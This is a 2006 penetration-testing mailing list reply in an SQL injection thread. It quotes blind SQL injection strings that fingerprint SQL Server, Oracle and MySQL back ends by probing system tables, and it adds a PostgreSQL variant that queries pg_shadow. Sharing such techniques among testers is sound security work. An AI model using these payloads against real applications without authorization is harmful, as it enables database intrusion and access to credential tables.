Penetration Testing mailing list archives
RE: SQL injection (or not?)
From: Tonnerre Lombard <tonnerre.lombard () sygroup ch>
Date: Thu, 10 Aug 2006 06:31:08 +0200
Salut, On Wed, 2006-08-09 at 12:01 +0200, Isidro Ramon Labrador Rodriguez wrote:
Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a If it returns a valid value the database is SQL Server Parameter=[valid value]' and exists(select * from user_tables) and 'a'='a If it returns a valid value the database is Oracle Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a If it returns a valid value the database is MySQL
Parameter=[valid value]' and exists(select * from pg_shadow) and 'a'='a should tell you it's PostgreSQL. Tonnerre -- SyGroup GmbH Tonnerre Lombard Loesungen mit System Tel:+41 61 333 80 33 Roeschenzerstrasse 9 Fax:+41 61 383 14 67 4153 Reinach BL Web:www.sygroup.ch tonnerre.lombard () sygroup ch
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- SQL injection (or not?) rr (Aug 08)
- Re: SQL injection (or not?) Mike Klingler (Aug 08)
- Re: SQL injection (or not?) A. Ramos (Aug 09)
- <Possible follow-ups>
- RE: SQL injection (or not?) Isidro Ramon Labrador Rodriguez (Aug 09)
- RE: SQL injection (or not?) Tonnerre Lombard (Aug 09)
- Re: SQL injection (or not?) DokFLeed (Aug 09)
- Injected, whats next DokFLeed (Aug 17)
- Re: Injected, whats next Jon Hart (Aug 18)
- RE: Injected, whats next Clemens, Dan (Aug 18)
- Re: Injected, whats next Serg B. (Aug 18)
- Message not available
- Re: Injected, whats next Serg B. (Aug 18)
- Re: Injected, whats next Brendan Dolan-Gavitt (Aug 18)
- Re: Injected, whats next DokFLeed (Aug 18)